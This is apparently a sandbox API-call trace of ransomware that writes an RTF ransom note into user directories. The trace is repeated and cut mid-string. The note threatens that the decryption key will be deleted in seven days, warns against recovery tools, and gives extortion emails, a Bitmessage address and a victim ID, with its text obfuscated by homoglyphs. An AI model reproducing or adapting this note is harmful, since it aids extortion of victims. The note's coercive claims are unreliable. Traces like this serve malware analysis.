EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.052] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x23608a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aó\"\x01", lpUsedDefaultChar=0x0) returned 8717 [0292.052] WriteFile (in: hFile=0x228, lpBuffer=0x23608a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x23608a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.053] CloseHandle (hObject=0x228) returned 1 [0292.053] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\#readme_eman#.rtf")) returned 0xffffffff [0292.053] GetLastError () returned 0x2 [0292.053] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\en\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.086] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of 